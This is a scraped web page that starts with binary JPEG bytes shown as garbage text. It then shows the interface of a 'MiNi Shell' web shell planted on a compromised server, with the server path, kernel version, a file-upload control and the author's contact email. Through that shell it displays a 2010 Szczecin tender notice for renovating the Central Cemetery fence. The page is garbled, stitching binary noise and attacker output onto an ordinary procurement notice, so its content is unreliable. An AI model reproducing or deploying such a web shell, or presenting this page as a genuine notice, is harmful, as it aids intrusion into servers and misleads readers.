JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100412/100992-N-2010.html

<p class="kh_header"><b>Szczecin: Remont ogrodzenia Cmentarza Centralnego w Szczecinie - etap II.</b><br>
<b>Numer ogłoszenia: 100992 - 2010; data zamieszczenia: 12.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Usług Komunalnych , ul. Ku Słońcu 125a, 71-080 Szczecin, woj. zachodniopomorskie, tel. 091 484 82 94, faks 091 484 80 55.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zuk.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna jednostki samorządu terytorialnego - zakład budżetowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont ogrodzenia Cmentarza Centralnego w Szczecinie - etap II..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. 	Przedmiotem zamówienia jest remont ogrodzenia Cmentarza Centralnego w Szczecinie - 		etap II.   
	 	2.  Zakres rzeczowy zamówienia obejmuje:
1) 	prace konserwatorskie elementów metalowych (15 przęseł - od przęsła nr 21 włącznie do przęsła nr 35 - 150 mb), w tym m. in.: 
	a)	demontaż elementów,
	b)	oczyszczenie z nawarstwień korozyjnych i farby metodą piaskowania,
	c)	odtłuszczenie elementów stalowych,
	d)	prostowanie elementów zdeformowanych, uzupełnienie brakujących fragmentów,
	e)	naniesienie powłok antykorozyjnych i kolorystycznych,
	f)		montaż elementów po wykonanych pracach konserwatorskich,	
 2)	prace konserwatorskie elementów ceglanych, w tym m. in.:
	a)	oczyszczenie powierzchni z farb i nawarstwień powierzchniowych,
	b)	usuniecie uszkodzonych i odspojonych fug, wtórnych uzupełnień,
	c)	dezynfekcja,
	d)	uzupełnienie ubytków w elementach ceglanych,
	e)	uzupełnienie fug pomiędzy elementami ceramicznymi i elementami z kamienia,
	f)		wzmocnienie spękań z zaprawy,
	g)	przemurowanie słupków i cokołów odchylonych od pionu,
	h)	wymurowanie zniszczonych fragmentów muru w partiach ceglanych elementów 			fundamentu od strony cmentarza,
	i)		hydrofobizacja strukturalna cegieł,
  3)	naprawa bram w ogrodzeniu:
	a)	wymiana skorodowanych i zniszczonych blach,
	b)	naprawa lub wymiana zamków.




3.  Wykonawca zobowiązany jest również do:
	1)	organizacji placu budowy i zaplecza socjalnego,
	2)	uzyskania niezbędnych uzgodnień, zezwoleń związanych z zajęciem ulic i pasów 		drogowych oraz poniesienia wszelkich kosztów wynikających z tego tytułu, jak 			również do wykonania wszelkich prac wynikających z ww. zezwoleń,
	3)	wykonania oznakowania terenu budowy zgodnie z obowiązującymi przepisami,
	4) 	zapewnienia bezpieczeństwa na placu budowy zgodnie z przepisami p.poż. i bhp,
	5)	zapewnienia dostawy wody i energii elektrycznej we własnym zakresie,
      6)	zabezpieczenia własnego mienia na terenie robót,
      7)	uporządkowania terenu po realizacji przedmiotu zamówienia,
	8)	przekazania Zamawiającemu atestów, certyfikatów, deklaracji zgodności, certyfikatów 		bezpieczeństwa aprobat technicznych, itp. na wbudowane materiały.
4.   Zamawiający zobowiązuje się:
1)	przekazać protokolarnie Wykonawcy plac budowy w terminie nie dłuższym niż 3 dni roboczych od dnia podpisania umowy,
2)	dokonać odbioru wykonanych prac,
3)	zapewnić zapłatę wynagrodzenia za wykonane prace.
5.  Podwykonawcy:
	1) 	Wykonawca może wykonać przedmiot zamówienia przy udziale podwykonawców, 		zawierając z nimi stosowne umowy w formie pisemnej pod rygorem nieważności,
	2)	Zawarcie umowy z podwykonawcą wymaga akceptacji Zamawiającego przed jej 		zawarciem,	
	3) Zamawiający nie wyraża zgody na zawieranie umów przez podwykonawców 
		z dalszym podwykonawcą,
	4)	Wszelkie zmiany umów wymagają formy pisemnej pod rygorem nieważności 
		i wymagają zgody Zamawiającego,
	5)	Wykonawca zobowiązany jest na żądanie Zamawiającego udzielić mu wszelkich 		informacji dotyczących podwykonawców,
	6)	Wykonawca ponosi wobec Zamawiającego pełną odpowiedzialność za roboty, które 		wykonuje przy pomocy podwykonawców, jak za działania własne. 
6. Wykonawca wykona przedmiot zamówienia zgodnie z zasadami współczesnej wiedzy 	technicznej, obowiązującymi normami, przepisami prawa powszechnie obowiązującego, 	m. in. ustawą z dnia 27 stycznia 2001 r. o odpadach (Dz.U. Nr 62 poz. 628 ze zmianami), 	ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach 	(Dz.U. Nr 132 poz. 622 ze zmianami) oraz ustawą z dnia z dnia 16 kwietnia 2004 r. 
	o ochronie przyrody (Dz. U. Nr 92 poz. 880 ze zmianami), a także z zapisami Specyfikacji 	Istotnych Warunków Zamówienia i z ofertą, która będzie stanowiła integralną część 	umowy.
7.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy 
w stosunku do treści oferty, a mianowicie:
1)	zmiany terminu realizacji przedmiotu zamówienia z powodu: 
	a) 	braku lub wady dokumentacji projektowej lub wystąpienia konieczności wykonania dokumentacji zamiennej, gdy czas na usunięcie braków i wad lub  wykonanie dokumentacji zamiennej, spowoduje wydłużenie terminu realizacji niniejszej umowy;
	b) wyjątkowo niesprzyjających warunków atmosferycznych uniemożliwiających wykonanie robót zgodnie z zasadami współczesnej wiedzy technicznej 
i obowiązujących przepisów; 
	c)	wystąpienia siły wyższej, czyli zdarzenia zewnętrznego, którego skutków nie da 		się 	przewidzieć, np. huragan, powódź;

		d)  wystąpienia konieczności wykonania zamówienia dodatkowego, którego realizacja
                 ma wpływ na termin wykonania umowy;
2)	zmniejszenia wynagrodzenia ryczałtowego, jeśli w toku wykonania robót Strony 	uzgodniły: 
a)	zmianę sposobu przeprowadzenia robót, np. z powodu możliwości zastosowania innej, korzystniejszej ekonomicznie technologii niż ta, która była przewidziana do dnia składania ofert,
b)	użycie innych materiałów (odpowiednio przy zachowaniu parametrów technicznych) powodujących obniżenie wartości robót, np. z powodu niedostępności na rynku materiałów, których użycie było przewidziane do dnia składania ofert, 
c)	ograniczenia zakresu robót, np. w przypadku zmiany sposobu przeprowadzenia robót lub użycia innych materiałów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.45.31.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy, dotyczące posiadania wiedzy i doświadczenia, poprzez wykazanie, że:
A. wykonali należycie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch robót budowlanych podobnych do robót objętych przedmiotem zamówienia, a mianowicie:
       -	co najmniej jedną robotę budowlaną podobną polegającą na konserwacji    elementów budowlanych z cegły, o wartości nie mniejszej niż 50 000,00 zł brutto,
       oraz	
       -	co najmniej jedną robotę budowlaną podobną polegającą na remoncie elementów metalowych, o wartości nie mniejszej niż 50 000,00 zł brutto,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy, dotyczące dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, poprzez wykazanie, że:

A.  dysponują lub będą dysponować co najmniej jedną osobą - do pełnienia funkcji kierownika budowy, posiadającą uprawnienia budowlane w specjalności konstrukcyjno - budowlanej, przynależącą do właściwej izby samorządu zawodowego oraz która:
      - odbyła co najmniej 2 - letnią praktykę zawodową na budowie przy zabytkach 	nieruchomych, zgodnie z § 8.1 rozporządzenia Ministra Kultury z dnia 
	9 czerwca 	2004 r. w sprawie prowadzenia prac konserwatorskich, 	restauratorskich, robót budowlanych, badań konserwatorskich 
	i architektonicznych, a także innych działań przy zabytku wpisanym do 	rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub 	porzuconych zabytków ruchomych (Dz. U. Nr 150 poz. 1579),
      		lub
	     - posiada zaświadczenie o kwalifikacjach do nadzorowania i kierowania     	robotami budowlanymi przy zabytkach nieruchomych, zgodnie z § 19 	rozporządzenia Ministra Kultury i Sztuki z dnia 24 sierpnia 1964 r. 
	w sprawie zezwoleń na prowadzenie prac konserwatorskich przy zabytkach 
	i archeologicznych prac wykopaliskowych (Dz.U. Nr 31 poz. 197),
		lub 
	     -	posiada zaświadczenie o kwalifikacjach do kierowania robotami 	budowlanymi w specjalności architektonicznej lub innych specjalnościach 	techniczno - budowlanych przy zabytkach nieruchomych, zgodnie z  § 20 	rozporządzenia Ministra Kultury i Sztuki z dnia 11 sierpnia 1994 r. 
	o zasadach i trybie udzielania zezwoleń na prowadzenie prac 	konserwatorskich przy zabytkach oraz prac archeologicznych 
	i wykopaliskowych, warunkach prowadzenia i kwalifikacjach osób, które 	mają prawo prowadzenia tej działalności (Dz.U. Nr 16 poz. 55).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)  oferta cenowa - zgodnie z rozdziałem I pkt 3 do SIWZ;
 	W przypadku składania oferty wspólnej należy złożyć jedną ofertę cenową ;
        2) 	odpowiednie pełnomocnictwa;  
	Tylko w sytuacjach określonych w rozdziale I pkt 5 zdanie drugie SIWZ lub 
	w przypadku składania oferty wspólnej (rozdział III pkt 1 SIWZ); 
	Zamawiający zaleca przedłożenie w ofercie dokumentu (ów), z którego będzie wynikało upoważnione do składania oświadczeń woli w imieniu wykonawcy, czyli odpowiednio odpisu z Krajowego Rejestru Sądowego albo wpisu do ewidencji działalności gospodarczej.
       3)	oświadczenie według wzoru stanowiącego załącznik nr 1, wskazujące cześć 	zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli 	wykonawca przewiduje udział podwykonawców);
            W przypadku składania oferty wspólnej należy złożyć jedno oświadczenie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy 
w stosunku do treści oferty, a mianowicie:
1)	zmiany terminu realizacji przedmiotu zamówienia z powodu: 
	a) 	braku lub wady dokumentacji projektowej lub wystąpienia konieczności wykonania dokumentacji zamiennej, gdy czas na usunięcie braków i wad lub  wykonanie dokumentacji zamiennej, spowoduje wydłużenie terminu realizacji niniejszej umowy;
	b) wyjątkowo niesprzyjających warunków atmosferycznych uniemożliwiających wykonanie robót zgodnie z zasadami współczesnej wiedzy technicznej 
i obowiązujących przepisów; 
	c)	wystąpienia siły wyższej, czyli zdarzenia zewnętrznego, którego skutków nie da 		się 	przewidzieć, np. huragan, powódź;

		d)  wystąpienia konieczności wykonania zamówienia dodatkowego, którego realizacja
                 ma wpływ na termin wykonania umowy;
2)	zmniejszenia wynagrodzenia ryczałtowego, jeśli w toku wykonania robót Strony 	uzgodniły: 
a)	zmianę sposobu przeprowadzenia robót, np. z powodu możliwości zastosowania innej, korzystniejszej ekonomicznie technologii niż ta, która była przewidziana do dnia składania ofert,
b)	użycie innych materiałów (odpowiednio przy zachowaniu parametrów technicznych) powodujących obniżenie wartości robót, np. z powodu niedostępności na rynku materiałów, których użycie było przewidziane do dnia składania ofert, 
c)	ograniczenia zakresu robót, np. w przypadku zmiany sposobu przeprowadzenia robót lub użycia innych materiałów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zuk.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego - 71-080 Szczecin, ul. Ku Słońcu 125A; pok. 17-18.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2010 godzina 10:00, miejsce: Siedziba Zamawiającego - 71-080 Szczecin, ul. Ku Słońcu 125A; sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com